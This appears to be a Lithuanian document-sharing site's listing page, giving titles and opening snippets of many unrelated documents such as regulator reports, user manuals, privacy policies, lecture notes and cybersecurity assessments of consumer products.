DetaliauLIETUVOS RESPUBLIKOS RYŠIŲ REGULIAVIMO TARNYBOS TINKLŲ IR INFORMACIJOS SAUGUMO DEPARTAMENTO SAUGUMO INCIDENTŲ TYRIMŲ SKYRIUS (CERT-LT) 2016 METŲ VEIKL
LIETUVOS RESPUBLIKOS RYŠIŲ REGULIAVIMO TARNYBOS TINKLŲ IR INFORMACIJOS SAUGUMO DEPARTAMENTO SAUGUMO INCIDENTŲ TYRIMŲ SKYRIUS (CERT-LT) Lietuvos Respublikos ryšių reguliavimo tarnyba, vykdanti nacionalinio
DetaliauEDUKA DIENYNO IR EDUKA KLASĖS INTEGRACIJA KAIP NAUDOTIS EDUKA KLASĖS IR DIENYNO INTEGRACIJA?... 2 Kaip prisijungti prie EDUKA klasės?... 2 Kaip įkelti
EDUKA DIENYNO IR EDUKA KLASĖS INTEGRACIJA KAIP NAUDOTIS EDUKA KLASĖS IR DIENYNO INTEGRACIJA?... 2 Kaip prisijungti prie EDUKA klasės?... 2 Kaip įkelti grupę iš EDUKA dienyno?... 3 Kaip iš EDUKA klasės
DetaliauTechninė dokumentacija Qlik Sense architektūros apžvalga 2015 m. gruodis qlik.com
Techninė dokumentacija Qlik Sense architektūros apžvalga 2015 m. gruodis qlik.com Platforma Qlik Sense tai analitikos platforma, naudojanti asociatyvinį analitikos variklį operatyvinėje atmintyje. Remiantis
DetaliauMano ERGO savitarnos sistema mano.ergo.lt (Naudotojo atmintinė) 1) Kaip prisijungti prie savitarnos sistemos? 1. Naršyklės lange įveskite mano.ergo.lt
Mano ERGO savitarnos sistema mano.ergo.lt (Naudotojo atmintinė) 1) Kaip prisijungti prie savitarnos sistemos? 1. Naršyklės lange įveskite mano.ergo.lt 2. Pasirinkite vieną iš prisijungimo būdų: el. bankininkystę,
DetaliauBanko_paslaugu_internetu_teikimo_salygos_
Banko paslaugų internetu teikimo sąlygos 1. Banko paslaugos internetu tai AB SEB banko (toliau Bankas) ir SEB grupės įmonių, kurioms atstovauja Bankas ar kurios naudojasi Banko paslaugų internetu sistema,
DetaliauMuzikos duomenų bazės NAXOS Music Library naudojimo vadovas Turinys Kas yra NAXOS Music Library... 2 Kaip pradėti naudotis... 3 Kaip atlikti paiešką..
Muzikos duomenų bazės NAXOS Music Library naudojimo vadovas Turinys Kas yra NAXOS Music Library... 2 Kaip pradėti naudotis... 3 Kaip atlikti paiešką... 3 Paprastoji paieška... 3 Išplėstinė paieška... 3
DetaliauA. Merkys ASOCIACIJA LANGAS Į ATEITĮ, 2015 m. Elektroninis mokymasis Tikriausiai šiais laikais daugelis esate girdėję apie elektroninį bei nuotolinį m
A. Merkys ASOCIACIJA LANGAS Į ATEITĮ, 2015 m. Elektroninis mokymasis Tikriausiai šiais laikais daugelis esate girdėję apie elektroninį bei nuotolinį mokymą(si) ar net jį išbandę. Jis taikomas ne tik išsivysčiusiose
DetaliauCloud_sprendimu_salygos.pdf
Sąvokos: SPECIALIOSIOS PUBLIC CLOUD INSTANCE PASLAUGOS NAUDOJIMO SĄLYGOS Versija: 2012-06-11 GAMA VERSIJA API (Application Programming Interface): Taikomojo programavimo sąsaja, kurią naudodamas Klientas
DetaliauIndividualus projektas Programa TE-PM, TE-PS, TE-SL, TEstream 4, TEstream 6, TEstream 8, TEstreamOBD 4, TEstreamOBD 6, TEstreamOBD 8 sistemų naudotoja
Individualus projektas Programa TE-PM, TE-PS, TE-SL, TEstream 4, TEstream 6, TEstream 8, TEstreamOBD 4, TEstreamOBD 6, TEstreamOBD 8 sistemų naudotojams Alternatyvus valdymo pultas telefone ViPGaS programos
DetaliauPS Testavimo ir konfigūravimo valdymas Užduotis nr. 1. Karolis Brazauskas Mindaugas Rekevičius Jonas Riliškis Eugenijus Sabaliauskas
PS Testavimo ir konfigūravimo valdymas Užduotis nr. 1. Karolis Brazauskas Mindaugas Rekevičius Jonas Riliškis Eugenijus Sabaliauskas 2014-10-01 IT Kompanija Dirbame pagal užsakymus, daugiausiai 2 projektai
DetaliauLMTA prenumeruojamos duomenų bazės
LMTA PRENUMERUOJAMOS DUOMENŲ BAZĖS LMTA PRENUMERUOJAMOS DUOMENŲ BAZĖS EBSCO JSTOR Taylor & Francis Naxos Music Library Grove Music Online (Oxford Music Library) Emerald Management ejournals Collection
DetaliauAutomatinis skolinimas Automatinio skolinimo paslauga automatiškai teikia pasiūlymus paskolų prašymams pagal Jūsų pasirinkto portfelio rinkinio nustat
Automatinis skolinimas Automatinio skolinimo paslauga automatiškai teikia pasiūlymus paskolų prašymams pagal Jūsų pasirinkto portfelio rinkinio nustatymus. Automatinio skolinimo paslauga yra efektyvi priemonė
DetaliauFile Transfer programinės įrangos naudotojo instrukcija
File Transfer programinės įrangos naudotojo instrukcija Rinkmenos dalių įkėlimas naudojantis i.saf-t FileTransfer FileTransfer programinė įranga (toliau - FileTransfer PĮ) skirta didelės apimties rinkmenos
DetaliauSlaptažodžių generatoriaus naudojimo instrukcija Slaptažodžių generatorius tai aukščiausius saugumo reikalavimus atitinkantis įrenginys, kuris generuo
Slaptažodžių generatoriaus naudojimo instrukcija Slaptažodžių generatorius tai aukščiausius saugumo reikalavimus atitinkantis įrenginys, kuris generuoja vienkartinius skaitmenimis išreiškiamus slaptažodžius.
DetaliauHands-on exercise
Patvirtinamasis dokumentas 1 (4) 2017 m. gegužės 25 d. Praktinė užduotis Su sprendiniais 1 Turinys 1. Įvadas... 2 2. Instrukcijos... 2 2.1. Sutartiniai ženklai... 2 2.2. Užduoties etapai... 2 3. Užduoties
DetaliauPowerPoint Presentation
Saugumas Microsoft Active Directory aplinkoje KĘSTUTIS MEŠKONIS Vyr. sistemų inžinierius-konsultantas 2018-05-10 Fake Security Negalime būti tikri dėl saugumo produkto kokybės Nuotraukos: www.fakesecurity.com
DetaliauMasyvas su C++ Užduotys. Išsiaiškinkite kodą (jei reikia pataisykite) ir paleiskite per programą. Ciklo skaitliuko įrašymas į vienmatį masyvą: #includ
Masyvas su C++ Užduotys. Išsiaiškinkite kodą (jei reikia pataisykite) ir paleiskite per programą. Ciklo skaitliuko įrašymas į vienmatį masyvą: #include main() int mas[100]; int k; for (int
DetaliauMicrosoft Word - Dambrauskas_magistrinis.doc
KAUNO TECHNOLOGIJOS UNIVERSITETAS INFORMATIKOS FAKULTETAS INFORMACIJOS SISTEM KATEDRA Donatas Dambrauskas Informacini sistem tezauro modelis ir jo gyvendinimas internete Informatikos mokslo magistro baigiamasis
DetaliauXVR įrašymo įrenginys Vartotojo vadovas Versija
XVR įrašymo įrenginys Vartotojo vadovas Versija 7.1.33.1 PERSPĖJIMAS Copyright 2017 Be raštiško kompanijos sutikimo draudžiama šį leidinį ar jo dalį kopijuoti, platinti ar kitaip panaudoti juridiniams
DetaliauCompoundJS Node on rails
CompoundJS Node on rails Turinys Node pristatymas Node platformos Sintaksės palyginimas Našumo palyginimas Node? Kas tai? 1 http = require("http") 2 onrequest = (request, response)-> 3 console.log("request
DetaliauMBP85CONNECT_EU_EN.book
Vartotojo instrukcija Wi-Fi mobiliosios auklės kamera Modelis: MBP85CONNECT Apžvalga: 1 2 8 3 4 5 6 7 9 10 11 1. Šviesos daviklis (naktinio matymo sensorius) 2. Kameros lęšis 3. Infraraudonųjų spindulių
DetaliauDBVS realizavimas Pagrindiniai DBVS komponentai Duomenų saugojimas diske Paruošė J.Skučas
DBVS realizavimas Pagrindiniai DBVS komponentai Duomenų saugojimas diske Paruošė J.Skučas Seminaro tikslai Trumpai apžvelgti pagrindinius DBVS komponentus Detaliai nagrinėjami optimalaus duomenų dėstymo
DetaliauPensijų sistemos reforma PRIVATUMO POLITIKA Šios privatumo politikos tikslas. Ši privatumo politika ( Privatumo politika ) nustato asmens duomenų tvar
Pensijų sistemos reforma PRIVATUMO POLITIKA Šios privatumo politikos tikslas. Ši privatumo politika ( Privatumo politika ) nustato asmens duomenų tvarkymo principus ir sąlygas Jums dalyvaujant apklausoje
DetaliauSlide 1
Duomenų struktūros ir algoritmai 2 paskaita 2019-02-13 Algoritmo sąvoka Algoritmas tai tam tikra veiksmų seka, kurią reikia atlikti norint gauti rezultatą. Įvesties duomenys ALGORITMAS Išvesties duomenys
DetaliauMicrosoft Word - 15_paskaita.doc
15 PASKAITA Turinys: Išimtys Išimtys (exceptions) programos vykdymo metu kylančios klaidingos situacijos, nutraukiančios programos darbą (pavyzdžiui, dalyba iš nulio, klaida atveriant duomenų failą, indekso
DetaliauJABRA REVO WIRELESS Naudotojo Vadovas jabra.com/revowireless
Naudotojo Vadovas jabra.com/revowireless TURINYS 1. SVEIKI...3 2. APŽVALGA... 4 3. KAIP DĖVĖTI...5 3.1 AUKŠČIO REGULIAVIMAS 3.2 SULENKIAMI LANKSTAI 4. ĮKROVIMAS...7 4.1 BATERIJOS BŪSENA 5. PRIJUNGIMAS...
DetaliauUAB VALENTIS PRIVATUMO POLITIKA Uždaroji akcinė bendrovė Valentis (toliau Valentis arba mes), įgyvendindama 2016 m. balandžio 27 d. Europos Parlamento
UAB VALENTIS PRIVATUMO POLITIKA Uždaroji akcinė bendrovė Valentis (toliau Valentis arba mes), įgyvendindama 2016 m. balandžio 27 d. Europos Parlamento ir Tarybos reglamento (ES) 2016/679 dėl fizinių asmenų
DetaliauEUROPOS KOMISIJA Briuselis, C(2017) 4679 final KOMISIJOS ĮGYVENDINIMO SPRENDIMAS (ES) / dėl bendros sistemos techninių standa
EUROPOS KOMISIJA Briuselis, 2017 07 11 C(2017) 4679 final KOMISIJOS ĮGYVENDINIMO SPRENDIMAS (ES) /... 2017 07 11 dėl bendros sistemos techninių standartų ir formatų, kad EURES portale būtų galima susieti
DetaliauPowerPoint Presentation
Bibliotekos ištekliai ir paslaugos BIBLIOTEKA Centrinė biblioteka Gedimino g. 50 Mechanikos inžinerijos ir dizaino fakulteto biblioteka Studentų g. 56 Informatikos fakulteto biblioteka Studentų g. 50 Statybos
DetaliauValdiklis su vidiniu keturių dažnių GSM/GPRS/3G modemu MCL 5 IP Naudotojo vadovas Versija 2.0 UAB NAVITUS LT Lietuva, 2018
Valdiklis su vidiniu keturių dažnių GSM/GPRS/3G modemu MCL 5 IP Naudotojo vadovas Versija 2.0 UAB NAVITUS LT Lietuva, 2018 Dokumento redagavimo istorija Versija Data Redagavimo istorija Valdiklio programinės
DetaliauGPAIS vartotojo vadovas savivaldybėms GPAIS VARTOTOJO VADOVAS SAVIVALDYBIŲ PILDOMAI INFORMACIJAI GPAIS TURINYS 1. BENDRI DARBO SU GPAIS PRINCIPAI... 2
GPAIS VARTOTOJO VADOVAS SAVIVALDYBIŲ PILDOMAI INFORMACIJAI GPAIS TURINYS 1. BENDRI DARBO SU GPAIS PRINCIPAI... 2 1.1 PRISIJUNGIMAS PRIE IŠORINIO PORTALO... 2 2. Savivaldybių ir regiono plėtros tarybų ataskaitos...
DetaliauDIGIPASS DP 260 VARTOTOJO INSTRUKCIJA
DIGIPASS DP 260 VARTOTOJO INSTRUKCIJA Turinys 1. Kas tai yra DIGIPASS? 2. Kaip įjungti DIGIPASS, įvesti ir pakeisti PIN- kodą? 3.Kaip naudotis DIGIPASS? 1. Kas tai yra? - DIGIPASS 260 Kliento identifikavimo
DetaliauREKOMENDACIJA ASMENS DUOMENŲ IR PRIVATUMO APSAUGA NAUDOJANTIS BELAIDŽIAIS TINKLAIS ĮŽANGA Skaitmeniniame pasaulyje mūsų privatumas ir asmens duomenų s
REKOMENDACIJA ASMENS DUOMENŲ IR PRIVATUMO APSAUGA NAUDOJANTIS BELAIDŽIAIS TINKLAIS ĮŽANGA Skaitmeniniame pasaulyje mūsų privatumas ir asmens duomenų saugumas yra gana trapus, todėl svarbu tuo rūpintis
DetaliauG L v SEB bankas nuasmeninta
Ginčo byla Nr. 2018-00589 LIETUVOS BANKO PRIEŽIŪROS TARNYBOS FINANSINIŲ PASLAUGŲ IR RINKŲ PRIEŽIŪROS DEPARTAMENTO DIREKTORIUS SPRENDIMAS DĖL G. L. IR AB SEB BANKO GINČO NAGRINĖJIMO 2018 m. birželio 27
DetaliauJava esminės klasės, 1 dalis Išimtys, Įvestis/išvestis
Java esminės klasės, 1 dalis Išimtys, Įvestis/išvestis Klaidų apdorojimas C kalboje If (kazkokia_salyga) { klaidos_apdorojimas(); return... } Tokio kodo apimtis galėdavo sekti iki 70-80proc. Klaidų/išimčių
DetaliauLIETUVOS RESPUBLIKOS RYŠIŲ REGULIAVIMO TARNYBA STRATEGIJOS DEPARTAMENTAS EKONOMINĖS ANALIZĖS SKYRIUS 2017 M. I KETVIRTĮ VYKDYTOS ELEKTRONINIŲ RYŠIŲ VE
LIETUVOS RESPUBLIKOS RYŠIŲ REGULIAVIMO TARNYBA STRATEGIJOS DEPARTAMENTAS EKONOMINĖS ANALIZĖS SKYRIUS 2017 M. I KETVIRTĮ VYKDYTOS ELEKTRONINIŲ RYŠIŲ VEIKLOS ATASKAITA PAGAL ELEKTRONINIŲ RYŠIŲ TINKLŲ IR
DetaliauLayout 1
Kvalifikacijos kėlimo kursų programos Pneumatika Pneumatikos pagrindai mašinų operatoriams P100 Suteikite savo mašinų operatoriams įgūdžių optimalaus darbinio slėgio nustatymui, oro pratekėjimų (nuostolių)
DetaliauUser Guide
HP Pocket Playlist Naudotojo vadovas Dokumento Nr. 699916-E22 Antrasis leidimas: 2013 m. sausis Pirmasis leidimas: 2012 m. gruodžio mėn. Copyright 2012, 2013 Hewlett-Packard Development Company, L.P. Microsoft,
DetaliauTiesioginio-debeto-paslaugos-duomenu-apsikeitimo-formatu-aprasas
TIEIOGINIO DEBETO PALAUGO DUOMENŲ APIKEITIMO FORMATŲ APRAŠA Tarp banko ir kliento yra keičiamasi tokio tipo failais: utikimai mokėti tiesioginio debeto būdu, priimti įmonėje (failo plėtinys.dse). o Banko
DetaliauPATVIRTINTA Kauno sporto mokyklos Startas Direktoriaus 2019 m. balandžio 23 d. įsakymu Nr KAUNO SPORTO MOKYKLOS STARTAS PRIVATUMO POLITIKA Kauno
PATVIRTINTA Kauno sporto mokyklos Startas Direktoriaus 2019 m. balandžio 23 d. įsakymu Nr. 1-28 KAUNO SPORTO MOKYKLOS STARTAS PRIVATUMO POLITIKA Kauno sporto mokykla Startas (toliau - Mokykla) vertina
DetaliauDUOMENŲ TEIKIMO SUTARČIŲ REGISTRUI ELEKTRONINIU BŪDU
DUOMENŲ TEIKIMO SUTARČIŲ REGISTRUI ELEKTRONINIU BŪDU SUTARTIS NR. Valstybės įmonė Registrų centras (toliau Įmonė), atstovaujama generalinio direktoriaus Sauliaus Urbanavičiaus, veikiančio pagal Valstybės
Detaliaubrosiura A5 lt.indd
Vartotojų informuotumo apie sukčiavimą atsiskaitant elektroninėmis mokėjimo priemonėmis didinimas Vartotojų informuotumo apie sukčiavimą atsiskaitant elektroninėmis mokėjimo priemonėmis didinimas Leidinys
DetaliauMicrosoft Word - B AM MSWORD
25.11.2014 B8-0286/7 7 1 dalis 1. ragina valstybes nares ir Komisiją d ti tvarias pastangas įgyvendinti esamas taisykles ir užtikrinti, kad jų būtų laikomasi kaip visa apimančios strategijos dalį naikinti
DetaliauVALSTYBINIO SOCIALINIO DRAUDIMO FONDO VALDYBOS
VALSTYBINIO SOCIALINIO DRAUDIMO FONDO VALDYBOS PRIE SOCIALINĖS APSAUGOS IR DARBO MINISTERIJOS DIREKTORIAUS Į S A K Y M A S DĖL ELEKTRONINĖS DRAUDĖJŲ APTARNAVIMO SISTEMOS NAUDOJIMO TAISYKLIŲ PATVIRTINIMO
DetaliauHISREP sutartis notarams
DUOMENŲ TEIKIMO LIETUVOS RESPUBLIKOS HIPOTEKOS REGISTRUI ELEKTRONINIU BŪDU SUTARTIS NR. Valstybės įmonė Registrų centras (toliau Įmonė), atstovaujama direktoriaus Sauliaus Urbanavičiaus, veikiančio pagal
DetaliauTVARKOMŲ ASMENS DUOMENŲ SAUGUMO PRIEMONIŲ IR RIZIKOS VERTINIMO GAIRĖS ASMENS DUOMENŲ VALDYTOJAMS IR TVARKYTOJAMS Šios gairės parengtos remi
TVARKOMŲ ASMENS DUOMENŲ SAUGUMO PRIEMONIŲ IR RIZIKOS VERTINIMO GAIRĖS ASMENS DUOMENŲ VALDYTOJAMS IR TVARKYTOJAMS 2019-08-09 Šios gairės parengtos remiantis Europos Sąjungos kibernetinio saugumo agentūros
DetaliauKTU BIBLIOTEKOS PASLAUGOS
KTU BIBLIOTEKOS PASLAUGOS K T U B I B L I O T E K A Centrinė biblioteka K. Donelaičio g. 20 1. 2. 3. Cheminės technologijos fakulteto biblioteka Radvilėnų pl. 19 5. 4. Informatikos fakulteto biblioteka
Detaliau2016_Radviliskio_vanduo_Reguliuojamos_veiklos_Isvada_Atask_
NEPRIKLAUSOMO AUDITORIAUS IŠVADA Uždarosios akcins bendrovs Radviliškio vanduo vadovybei, Valstybinei kain ir energetikos kontrols komisijai Nuomon Mes atlikome Uždarosios akcins bendrovs Radviliškio vanduo
DetaliauMicrosoft PowerPoint - WACC ir BU-LRAIC klausimyno pristatymas ppt
Vidutins svertins kapitalo kainos (WACC) nustatymo ataskaitos ir BU-LRAIC klausimyno pristatymas 2008 m. rugsjo 22 d. Dienotvark WACC nustatymo metodikos ir rezultat pristatymas BU-LRAIC klausimyno pristatymas
DetaliauPowerPoint Presentation
Duomenų archyvai ir mokslo duomenų valdymo planai 2018-06-13 1 Re3Data duomenų talpyklų registras virš 2000 mokslinių tyrimų duomenų talpyklų; talpyklos paiešką galima atlikti pagal mokslo kryptį, šalį,
DetaliauTitle
Šiuolaikiškos ir labiau visai Europai pritaikytos autorių teisių sistemos kūrimas Vita Juknė Europos Komisijos Ryšių tinklų, turinio ir technologijų skyrius Išsakyta nuomonė yra asmeninė ir negali būti
DetaliauNKSC prie KAM Inovacijų ir mokymų skyrius Lietuvoje parduodamos WiFi įrangos kibernetinio saugumo vertinimas GAMINTOJO D-Link PROD
NKSC prie KAM Inovacijų ir mokymų skyrius support@ims.nksc.lt Lietuvoje parduodamos WiFi įrangos kibernetinio saugumo vertinimas GAMINTOJO D-Link PRODUKCIJOS ANALIZĖ NKSC prie KAM, siekdamas užtikrinti
DetaliauPowerPoint Presentation
Montažų kūrimas iš skaitmeninių nuotraukų naudojant Windows Photo Story 3 programą Photo Story 3 Priedas Windows XP, Windows 8, Windows 10 Skirtas kurti dinamiškus fotoreportažus iš turimų skaitmeninių
DetaliauLT11526 Antrasis leidimas Gegužė 2016 Elektroninis vadovas
LT11526 Antrasis leidimas Gegužė 2016 Elektroninis vadovas AUTORIŲ TEISIŲ INFORMACIJA Jokia šio vadovo dalis, įskaitant joje aprašomus gaminius ir programas, negali būti dauginama, perduodama, kopijuojama,
DetaliauMicrosoft Word - DV_Rekomendacijos2
DOKUMENTŲ VALDYMO FUNKCIJOS EFEKTYVAUS ATLIKIMO REKOMENDACIJOS I. BENDROSIOS NUOSTATOS Dokumentų valdymo funkcijos efektyvaus atlikimo rekomendacijų (toliau Rekomendacijos) tikslas nustatyti valstybės
DetaliauNAUDOTOJO VADOVAS Turinys I. Įžanga... 3 II. Prisijungimas... 3 III. Darbo pradžia... 5 IV. Metaduomenų įvedimas. Pirm
https://eureka.lrt.lt/metadata/ NAUDOTOJO VADOVAS Turinys I. Įžanga... 3 II. Prisijungimas... 3 III. Darbo pradžia... 5 IV. Metaduomenų įvedimas. Pirmasis žingsnis... 6 IV. Metaduomenų įvedimas. Antrasis
DetaliauRET2000 Elektronisis Skaitmeninis Termostatas su LCD
MAKING MODERN LIVING POSSIBLE RET2000 B/M/MS Elektroninis skaitmeninis termostatas su LCD Danfoss Heating Montavimo vadovas Norėdami gauti išsamią spausdintą šių instrukcijų versiją, skambinkite Rinkodaros
DetaliauLT.doc
EUROPOS KOMISIJA Vidaus rinkos ir paslaugų GD Paslaugos Administracinio bendradarbiavimo ir valstybių narių tinklai Briuselis, 2008 m. rugsėjo 22 d. MARKT/E3/(2008)42151 VARTOTOJO VADOVAS 1 dalis. IMI
DetaliauSistemos specifikacija
Finansinių ataskaitų rinkinių teikimo elektroniniu būdu (interaktyviai) Vartotojo vadovas Kaip pateikti finansinių ataskaitų rinkinį el. būdu interaktyviai 2(32) Turinys 1. Įvadas...3 2. Finansinių ataskaitų
DetaliauNACIONALINIS KIBERNETINIO SAUGUMO CENTRAS Tel El. p. NACIONALINIS KIBERNETINIO SAUGUMO CENTRAS PRIE KRAŠTO APSA
PRIE KRAŠTO APSAUGOS MINISTERIJOS TAIKOMOSIOS MOB. PROGRAMĖLĖS FaceApp KIBERNETINIO SAUGUMO VERTINIMO ATASKAITA 2019 m. Liepos 26 d. Nacionalinis kibernetinio saugumo centras (NKSC) prie Krašto apsaugos
DetaliauLietuvos mokslo ir studijų institucijų kompiuterių tinklas LITNET Vilniaus universitetas Failų dėtuvės paslauga Paslaugos administravimo instrukcija P
Lietuvos mokslo ir studijų institucijų kompiuterių tinklas LITNET Vilniaus universitetas Failų dėtuvės paslauga Paslaugos administravimo instrukcija Paslauga sukurta vykdant Europos socialinio fondo finansuojamą
DetaliauMicrosoft Word - SDH2.doc
PATVIRTINTA AB Lietuvos geleţinkeliai Geleţinkelių infrastruktūros direkcijos direktoriaus 2009-11-30 įsakymu Nr. Į (DI-161) SDH SĄSAJOS TECHNINIS APRAŠAS TURINYS I. BENDROJI DALIS... 4 II. TAIKYMO SRITIS...
DetaliauVALSTYBINĖS MOKESČIŲ INSPEKCIJOS
VALSTYBINĖS MOKESČIŲ INSPEKCIJOS PRIE LIETUVOS RESPUBLIKOS FINANSŲ MINISTERIJOS VIRŠININKO Į S A K Y M A S DĖL PRANEŠIMO APIE IDENTIFIKAVIMO ELEKTRONINIO DEKLARAVIMO INFORMACINĖJE SISTEMOJE PRIEMONES PRC905
DetaliauNEKILNOJAMO TURTO KADASTRO DUOMENŲ TEIKIMO IŠVADAI GAUTI EL. PASLAUGA: NAUDOTOJO VADOVAS NŽT DARBUOTOJAMS (V.1) VILNIUS 2017
NEKILNOJAMO TURTO KADASTRO DUOMENŲ TEIKIMO IŠVADAI GAUTI EL. PASLAUGA: NAUDOTOJO VADOVAS NŽT DARBUOTOJAMS (V.1) VILNIUS 2017 1. APIE PASLAUGĄ Paslaugos pavadinimas: Nekilnojamo turto kadastro duomenų teikimo
DetaliauSlide 1
Elektroninių įrenginių gamintojai Apie įmonę V. Bartkevičiaus įmonė Valsena buvo įkurta 1996 Birželio 4 dieną. Pagrindinė įmonės veikla unikalių mikroprocesorinių duomenų perdavimo prietaisų projektavimas
DetaliauAAA.AIEPI.Mokymu_medziaga_MOK_VI_07.Vandens_inventorizacijos_duomenu_tvarkymas.v.0.4
Informacinės sistemos eksploatacinė dokumentacija AIVIKS MOKYMO MEDŽIAGA 07. Vandens inventorizacijos duomenų tvarkymas Aplinkos apsaugos agentūra Aplinkosauginės informacijos elektroninių paslaugų išvystymas
DetaliauAlgoritmai ir duomenų struktūros (ADS) 2 paskaita Saulius Ragaišis, VU MIF
Algoritmai ir duomenų struktūros (ADS) 2 paskaita Saulius Ragaišis, VU MIF saulius.ragaisis@mif.vu.lt 2016-02-15 Tiesinės duomenų struktūros Panagrinėsime keletą žinomų ir įvairiuose taikymuose naudojamų
DetaliauUAB AMEA Business Solutions Praktiniai IT Sprendimai smulkioms ir vidutin ms mon ms Direktor, Jurgita Vitkauskait , K
UAB AMEA Business Solutions Praktiniai IT Sprendimai smulkioms ir vidutin ms mon ms Direktor, Jurgita Vitkauskait j.vitkauskaite@amea.lt 2011.02.17, Kaunas +370 698 13330 Apie mus UAB AMEA Business Solutions
DetaliauAtviro konkurso sąlygų 4 priedas BENDROJO PAGALBOS CENTRO INFORMACINĖS SISTEMOS APTARNAVIMO PASLAUGŲ TEIKIMO SPECIFIKACIJA 1. Pirkimo objektas Bendroj
Atviro konkurso sąlygų 4 priedas BENDROJO PAGALBOS CENTRO INFORMACINĖS SISTEMOS APTARNAVIMO PASLAUGŲ TEIKIMO SPECIFIKACIJA 1. Pirkimo objektas Bendrojo pagalbos centro informacinės sistemos BPCIS, esančios
DetaliauLIETUVOS RESPUBLIKOS AZARTINIŲ LOŠIMŲ ĮSTATYMO NR. IX-325 2, 10, 15, 16, 29 STRAIPSNIŲ PAKEITIMO IR ĮSTATYMO PAPILDYMO 15 1, 16 1 STRAIPSNIAIS ĮSTATYM
LIETUVOS RESPUBLIKOS AZARTINIŲ LOŠIMŲ ĮSTATYMO NR. IX-325 2, 10, 15, 16, 29 STRAIPSNIŲ PAKEITIMO IR ĮSTATYMO PAPILDYMO 15 1, 16 1 STRAIPSNIAIS ĮSTATYMAS 2017 m. lapkričio 21 d. Nr. XIII-771 Vilnius 1 straipsnis.
DetaliauI. KREDITO PARAIŠKOS IR KIT DOKUMENT PATEIKIMAS FINANSAVIMO ETAPAI KININKAMS Užpildykite kredito paraišk ir perduokite savo kredito vadybininkui arba
I. KREDITO PARAIŠKOS IR KIT DOKUMENT PATEIKIMAS Užpildykite kredito paraišk ir perduokite savo kredito vadybininkui arba atsiskite elektroniniu paštu ltinfo@pohjola.lt.! Kredito paraišk galite rasti interneto
DetaliauSlide 1
U n i x O S Vilniaus Universitetas Matematikos ir Informatikos fakultetas Rolandas Naujikas 2008 FA I L Ų S I S T E M A : F I Z I N I S D I S K O S K I R S T Y M A S 2007 MIF.VU 2 TA R K I M E... = 2007
DetaliauVISŲ TIPŲ IR GAMINTOJŲ MEMBRANINIAI DUJŲ SKAITIKLIAI 1. Skaitiklių savybės. Visų tipų ir gamintojų membraniniai dujų skaitikliai indikuoja vieną rodme
VISŲ TIPŲ IR GAMINTOJŲ MEMBRANINIAI DUJŲ SKAITIKLIAI 1. Skaitiklių savybės. Visų tipų ir gamintojų membraniniai dujų skaitikliai indikuoja vieną rodmenį. Jeigu įrengtas tik membraninis dujų skaitiklis,
DetaliauDažniausios IT VBE klaidos
Dažniausios IT VBE klaidos Renata Burbaitė renata.burbaite@gmail.com Kauno technologijos universitetas, Panevėžio Juozo Balčikonio gimnazija 1 Egzamino matrica (iš informacinių technologijų brandos egzamino
DetaliauVilius Nakutis
Interneto karštoji linija ir jos galimybės kovoje prieš patyčias Konferencija,,Be patyčių 365 2019 m. kovo 18 d. 1 INTERNETO KARŠTOJI LINIJA KAS TAI? Įkurta Ryšių reguliavimo tarnyboje (RRT) 2007 m., vykdant
DetaliauKRETINGOS RAJONO SAVIVALDYBĖS TARYBA SPRENDIMAS DĖL KRETINGOS RAJONO SAVIVALDYBĖS TARYBOS 2012 M. SAUSIO 26 D. SPRENDIMO NR. T2-6 DĖL PRIĖMIMO Į KRETI
KRETINGOS RAJONO SAVIVALDYBĖS TARYBA SPRENDIMAS DĖL KRETINGOS RAJONO SAVIVALDYBĖS TARYBOS 2012 M. SAUSIO 26 D. SPRENDIMO NR. T2-6 DĖL PRIĖMIMO Į KRETINGOS RAJONO SAVIVALDYBĖS BENDROJO UGDYMO MOKYKLAS TVARKOS
DetaliauProjektas LIETUVOS RESPUBLIKOS RYŠIŲ REGULIAVIMO TARNYBOS DIREKTORIUS ĮSAKYMAS DĖL RADIJO RYŠIO PLĖTROS MHz RADIJO DAŽNIŲ JUOSTOJE PLANO PAT
Projektas LIETUVOS RESPUBLIKOS RYŠIŲ REGULIAVIMO TARNYBOS DIREKTORIUS ĮSAKYMAS DĖL RADIJO RYŠIO PLĖTROS 3400 3800 MHz RADIJO DAŽNIŲ JUOSTOJE PLANO PATVIRTINIMO 2019 m. d. Nr. 1V- Vilnius Vadovaudamasis
DetaliauTechninis aprašymas Tolygaus valdymo pavara AME 435 Aprašymas Vožtuvo srauto reguliavimo funkciją. Srautą galima įvairiai reguliuoti nuo tiesinio iki
Techninis aprašymas Tolygaus valdymo pavara AME 435 Aprašymas Vožtuvo srauto reguliavimo funkciją. Srautą galima įvairiai reguliuoti nuo tiesinio iki logaritminio arba atvirkščiai. Nuo svyravimų sauganti
DetaliauSlide 1
Duomenų struktūros ir algoritmai 12 paskaita 2019-05-08 Norint kažką sukonstruoti, reikia... turėti detalių. 13 paskaitos tikslas Susipažinti su python modulio add.py 1.1 versija. Sukurti skaitmeninį modelį
DetaliauLietuvos mokslo ir studijų institucijų kompiuterių tinklas Litnet Vilniaus Gedimino technikos universitetas Virtualių serverių paslauga Paslaugos apra
Lietuvos mokslo ir studijų institucijų kompiuterių tinklas Litnet Vilniaus Gedimino technikos universitetas Virtualių serverių paslauga Paslaugos aprašas Paslauga sukurta vykdant Europos socialinio fondo
DetaliauŠvietimo programos priemonių aprašymas Eil. nr. Priemonė Tikslinės grupės Aprašymas Įgyvendinimo terminai ir tikslas (skaitinė reikšmė) Planas Faktas
Švietimo programos priemonių aprašymas (skaitinė reikšmė) 1. Nuolat atnaujinama informacija internetiniame puslapyje www.zaliasistaskas.lt apie pakuočių atliekų rūšiavimo svarbą. Tęstinė priemonė Organizacijos
Detaliau